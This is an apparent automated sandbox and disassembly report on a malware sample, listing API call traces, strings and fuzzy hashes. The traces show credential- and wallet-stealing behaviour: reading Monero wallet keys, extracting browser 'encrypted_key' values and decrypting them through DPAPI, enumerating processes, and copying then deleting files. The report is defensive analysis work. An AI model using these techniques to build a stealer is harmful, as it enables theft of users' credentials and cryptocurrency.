                        Similarity
                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                        • String ID:
                        • API String ID: 3225020163-0
                        • Opcode ID: 65ff62d5ec8b1292290ac1d438c3cafe6499ac35479c11be689b2af39b81d238
                        • Instruction ID: 38206bee60847987519ae06821527ca9d1d05efb49c410b999a8d359844ede43
                        • Opcode Fuzzy Hash: 65ff62d5ec8b1292290ac1d438c3cafe6499ac35479c11be689b2af39b81d238
                        • Instruction Fuzzy Hash: E501E1B9A40208BBDB04DFE4DC49FAEB7BCFB48701F10825AFE1597280D6759A419F51
                        APIs
                        Strings
                        Yara matches
                        Similarity
                        • API ID: String___crt$Type
                        • String ID:
                        • API String ID: 2109742289-3916222277
                        • Opcode ID: 9c99a84db5137a6869827c514629758eddb3c9fcde352deb6c1c07bdc72d6b21
                        • Instruction ID: fc199fc5cacdd86066d8c7e64fab9b57925553bac4998ac61e29592299b8f064
                        • Opcode Fuzzy Hash: 9c99a84db5137a6869827c514629758eddb3c9fcde352deb6c1c07bdc72d6b21
                        • Instruction Fuzzy Hash: 464107B110079C9EDB219B24CC84FFBBBEEAF46714F1444ECE98A86182D2719E45DF64
                        APIs
                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 006A6663
                          • Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788
                          • Part of subcall function 006AA9B0: lstrlen.KERNEL32(?,012691F0,?,\Monero\wallet.keys,006B0E17), ref: 006AA9C5
                          • Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
                          • Part of subcall function 006AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006AAA12
                          • Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,006B0E17), ref: 006AA905
                        • ShellExecuteEx.SHELL32(0000003C), ref: 006A6726
                        • ExitProcess.KERNEL32 ref: 006A6755
                        Strings
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                        • String ID: <
                        • API String ID: 1148417306-4251816714
                        • Opcode ID: 91fe7c957b6084cb049f0d747435e9ad00cb4253c00cac037fbda50a6b7f0364
                        • Instruction ID: 51fccbc823dd87218049062ac7967150cf907bacb44aa54f66cc7973267a3f59
                        • Opcode Fuzzy Hash: 91fe7c957b6084cb049f0d747435e9ad00cb4253c00cac037fbda50a6b7f0364
                        • Instruction Fuzzy Hash: 50312DB1D01218AFDB94FB90DC92BDE7779AF44300F40419AF20966191DF746B48CF5A
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,006B0E28,00000000,?), ref: 006A882F
                        • RtlAllocateHeap.NTDLL(00000000), ref: 006A8836
                        • wsprintfA.USER32 ref: 006A8850
                          • Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788
                        Strings
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateProcesslstrcpywsprintf
                        • String ID: %dx%d
                        • API String ID: 1695172769-2206825331
                        • Opcode ID: 6ecba93a4f5197f878f8b606c01ed01711dd5a4076cf8226e8c9eb56aab0089d
                        • Instruction ID: fab26cac4c670ed7a6adc53731e925ca5a2bc8c8cbe94f11eb8cf29124f85223
                        • Opcode Fuzzy Hash: 6ecba93a4f5197f878f8b606c01ed01711dd5a4076cf8226e8c9eb56aab0089d
                        • Instruction Fuzzy Hash: 012130B1A41204EFDB04DF94DD45FAEBBB8FB48701F20421AFA05A7280C7799D01CBA1
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,006A951E,00000000), ref: 006A8D5B
                        • RtlAllocateHeap.NTDLL(00000000), ref: 006A8D62
                        • wsprintfW.USER32 ref: 006A8D78
                        Strings
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateProcesswsprintf
                        • String ID: %hs
                        • API String ID: 769748085-2783943728
                        • Opcode ID: a346ac70ed33f3f9ed9818defdd5a23553b99c66b5f96dc177b9a6a04c76b8d8
                        • Instruction ID: 942bbe810ec5ea8580280938b1a2c30719b40d5ea8b047d67297156c97a92aa6
                        • Opcode Fuzzy Hash: a346ac70ed33f3f9ed9818defdd5a23553b99c66b5f96dc177b9a6a04c76b8d8
                        • Instruction Fuzzy Hash: 48E08CB0A41208BBDB04EF94DC0AE697BB8FB44702F2002A5FD0987280DA719E009B92
                        APIs
                          • Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788
                          • Part of subcall function 006AA9B0: lstrlen.KERNEL32(?,012691F0,?,\Monero\wallet.keys,006B0E17), ref: 006AA9C5
                          • Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
                          • Part of subcall function 006AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006AAA12
                          • Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,006B0E17), ref: 006AA905
                          • Part of subcall function 006A8B60: GetSystemTime.KERNEL32(006B0E1A,0126B828,006B05AE,?,?,006913F9,?,0000001A,006B0E1A,00000000,?,012691F0,?,\Monero\wallet.keys,006B0E17), ref: 006A8B86
                          • Part of subcall function 006AA920: lstrcpy.KERNEL32(00000000,?), ref: 006AA972
                          • Part of subcall function 006AA920: lstrcat.KERNEL32(00000000), ref: 006AA982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0069A2E1
                        • lstrlen.KERNEL32(00000000,00000000), ref: 0069A3FF
                        • lstrlen.KERNEL32(00000000), ref: 0069A6BC
                          • Part of subcall function 006AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 006AA7E6
                        • DeleteFileA.KERNEL32(00000000), ref: 0069A743
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                        • String ID:
                        • API String ID: 211194620-0
                        • Opcode ID: 253d5248bb69c7d5eb2ea3e92dab04155d4cf5793fdd7f0cc598c0cbee84d7f4
                        • Instruction ID: d58c2acfe870aac3873b1041955a6209c8c3903263c9bfe1c03d85b85b553c3b
                        • Opcode Fuzzy Hash: 253d5248bb69c7d5eb2ea3e92dab04155d4cf5793fdd7f0cc598c0cbee84d7f4
                        • Instruction Fuzzy Hash: 4EE1C8728101089ADB88FBE4DC92EEE733AAF15300F50815EF51766091EF346E49CF6A
                        APIs
                          • Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788
                          • Part of subcall function 006AA9B0: lstrlen.KERNEL32(?,012691F0,?,\Monero\wallet.keys,006B0E17), ref: 006AA9C5
                          • Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
                          • Part of subcall function 006AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006AAA12
                          • Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,006B0E17), ref: 006AA905
                          • Part of subcall function 006A8B60: GetSystemTime.KERNEL32(006B0E1A,0126B828,006B05AE,?,?,006913F9,?,0000001A,006B0E1A,00000000,?,012691F0,?,\Monero\wallet.keys,006B0E17), ref: 006A8B86
                          • Part of subcall function 006AA920: lstrcpy.KERNEL32(00000000,?), ref: 006AA972
                          • Part of subcall function 006AA920: lstrcat.KERNEL32(00000000), ref: 006AA982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0069D481
                        • lstrlen.KERNEL32(00000000), ref: 0069D698
                        • lstrlen.KERNEL32(00000000), ref: 0069D6AC
                        • DeleteFileA.KERNEL32(00000000), ref: 0069D72B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                        • String ID:
                        • API String ID: 211194620-0
                        • Opcode ID: 3ab8014c6c3fb2245c93d64ee45e5da72aa21dfc670d8719af0b4d8c2d4c27f0
                        • Instruction ID: ef146df3853f2c4ef3331f23d8f9e6f708beb079a7015fb2c183f0550584b445
                        • Opcode Fuzzy Hash: 3ab8014c6c3fb2245c93d64ee45e5da72aa21dfc670d8719af0b4d8c2d4c27f0
                        • Instruction Fuzzy Hash: BD91ED729111089ADB88FBE4DC92EEE737AAF15300F50416EF50766091EF346E49CF6A
                        APIs
                          • Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788
                          • Part of subcall function 006AA9B0: lstrlen.KERNEL32(?,012691F0,?,\Monero\wallet.keys,006B0E17), ref: 006AA9C5
                          • Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
                          • Part of subcall function 006AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006AAA12
                          • Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,006B0E17), ref: 006AA905
                          • Part of subcall function 006A8B60: GetSystemTime.KERNEL32(006B0E1A,0126B828,006B05AE,?,?,006913F9,?,0000001A,006B0E1A,00000000,?,012691F0,?,\Monero\wallet.keys,006B0E17), ref: 006A8B86
                          • Part of subcall function 006AA920: lstrcpy.KERNEL32(00000000,?), ref: 006AA972
                          • Part of subcall function 006AA920: lstrcat.KERNEL32(00000000), ref: 006AA982
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0069D801
                        • lstrlen.KERNEL32(00000000), ref: 0069D99F
                        • lstrlen.KERNEL32(00000000), ref: 0069D9B3
                        • DeleteFileA.KERNEL32(00000000), ref: 0069DA32
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                        • String ID:
                        • API String ID: 211194620-0
                        • Opcode ID: 4bb0663877d0d881c8c3cb04cca67eb9aaf24a5e4b1326606ab89a98eb6502b5
                        • Instruction ID: ec4fa0cc5a3bb6b965317fc3fc70457395b38941be1a3c294e1dde289388d8eb
                        • Opcode Fuzzy Hash: 4bb0663877d0d881c8c3cb04cca67eb9aaf24a5e4b1326606ab89a98eb6502b5
                        • Instruction Fuzzy Hash: D181DD719111089ADB88FBE4DC56AEE737AAF15300F50452EF507A6091EF346E09CF66
                        Strings
                        • sj, xrefs: 006A7111
                        • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 006A718C
                        • sj, xrefs: 006A72AE, 006A7179, 006A717C
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy
                        • String ID: sj$sj$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                        • API String ID: 3722407311-1829183765
                        • Opcode ID: ee0f78ab32e0d68763641ec86b13d2debf254814be2bace988a7df3406253f9f
                        • Instruction ID: 3f5bc1d3ce9f236983abab34819ce9f80fecef59a323ac78d69b8e1a04f6e764
                        • Opcode Fuzzy Hash: ee0f78ab32e0d68763641ec86b13d2debf254814be2bace988a7df3406253f9f
                        • Instruction Fuzzy Hash: B0518FB0D042089FDB64FB90DC85BEEB7B6AF55304F1441ADE21567282EB746E88CF58
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrlen
                        • String ID:
                        • API String ID: 367037083-0
                        • Opcode ID: 66824cb0c3823c4b4c26ab8525d1606a757f3493ca10b8678877a02684c6d88d
                        • Instruction ID: b254e5bc8835d62897b8d702fbf0e5ef272e9480f62383530ff56a49e0ee1728
                        • Opcode Fuzzy Hash: 66824cb0c3823c4b4c26ab8525d1606a757f3493ca10b8678877a02684c6d88d
                        • Instruction Fuzzy Hash: 3A415CB5D10109AFCB44FFE4D845AFEB7BAAB45304F108019F51276290EB34AA45CFA5
                        APIs
                          • Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788
                          • Part of subcall function 006999C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006999EC
                          • Part of subcall function 006999C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00699A11
                          • Part of subcall function 006999C0: LocalAlloc.KERNEL32(00000040,?), ref: 00699A31
                          • Part of subcall function 006999C0: ReadFile.KERNEL32(000000FF,?,00000000,0069148F,00000000), ref: 00699A5A
                          • Part of subcall function 006999C0: LocalFree.KERNEL32(0069148F), ref: 00699A90
                          • Part of subcall function 006999C0: CloseHandle.KERNEL32(000000FF), ref: 00699A9A
                          • Part of subcall function 006A8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 006A8E52
                        • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00699D39
                          • Part of subcall function 00699AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Ni,00000000,00000000), ref: 00699AEF
                          • Part of subcall function 00699AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00694EEE,00000000,?), ref: 00699B01
                          • Part of subcall function 00699AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Ni,00000000,00000000), ref: 00699B2A
                          • Part of subcall function 00699AC0: LocalFree.KERNEL32(?,?,?,?,00694EEE,00000000,?), ref: 00699B3F
                          • Part of subcall function 00699B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00699B84
                          • Part of subcall function 00699B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00699BA3
                          • Part of subcall function 00699B60: LocalFree.KERNEL32(?), ref: 00699BD3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                        • String ID: $"encrypted_key":"$DPAPI
                        • API String ID: 2100535398-738592651
                        • Opcode ID: 9d0dedd6ed9a672a0a6fb22be721f2d8efa819dbea89b59b43ee64327baa2d07
                        • Instruction ID: a8d3a2ac62e1aaf85b5b4252b1a097c2538ec6061acda280fe2b67579aa42999
                        • Opcode Fuzzy Hash: 9d0dedd6ed9a672a0a6fb22be721f2d8efa819dbea89b59b43ee64327baa2d07
                        • Instruction Fuzzy Hash: 253130B5D10109ABCF04EBE8DC85AFFB7BABF49304F14451DE905A7241E7349A44CBA5
                        APIs
                          • Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,006B05B7), ref: 006A86CA
                        • Process32First.KERNEL32(?,00000128), ref: 006A86DE
                        • Process32Next.KERNEL32(?,00000128), ref: 006A86F3
                          • Part of subcall function 006AA9B0: lstrlen.KERNEL32(?,012691F0,?,\Monero\wallet.keys,006B0E17), ref: 006AA9C5
                          • Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
                          • Part of subcall function 006AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006AAA12
                          • Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,006B0E17), ref: 006AA905
                        • CloseHandle.KERNEL32(?), ref: 006A8761
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                        • String ID:
                        • API String ID: 1066202413-0
                        • Opcode ID: 0e07c5a1e3774772d0a0852cb733dd2fd2c0d6372d101a2d483fad7567e022d8
                        • Instruction ID: 24a69466e996a197aa41d53b5ac417e176338160f2eaf49d6b374c2d511fbf61
                        • Opcode Fuzzy Hash: 0e07c5a1e3774772d0a0852cb733dd2fd2c0d6372d101a2d483fad7567e022d8
                        • Instruction Fuzzy Hash: E0314F71901218ABCBA4EF94CC45FEEB779FB46700F10429EE50AA2190DB346E45CFA1
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,006B0E00,00000000,?), ref: 006A79B0
                        • RtlAllocateHeap.NTDLL(00000000), ref: 006A79B7
                        • GetLocalTime.KERNEL32(?,?,?,?,?,006B0E00,00000000,?), ref: 006A79C4
                        • wsprintfA.USER32 ref: 006A79F3
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateLocalProcessTimewsprintf
                        • String ID:
                        • API String ID: 377395780-0
                        • Opcode ID: 07abde08ea2fa19c5793be513631f6deadbeb0c139b64c6d396d036c1a624299
                        • Instruction ID: 3f42e3b0e47451a647fbbaf998420d2af77329c5588b1f72523a10e15f18db93
                        • Opcode Fuzzy Hash: 07abde08ea2fa19c5793be513631f6deadbeb0c139b64c6d396d036c1a624299
                        • Instruction Fuzzy Hash: E3112AB2904118ABCB14DFC9DD45BBEB7F8FB4CB11F10421AFA05A2280D7399940DBB1
                        APIs
                        • __getptd.LIBCMT ref: 006AC74E
                          • Part of subcall function 006ABF9F: __amsg_exit.LIBCMT ref: 006ABFAF
                        • __getptd.LIBCMT ref: 006AC765
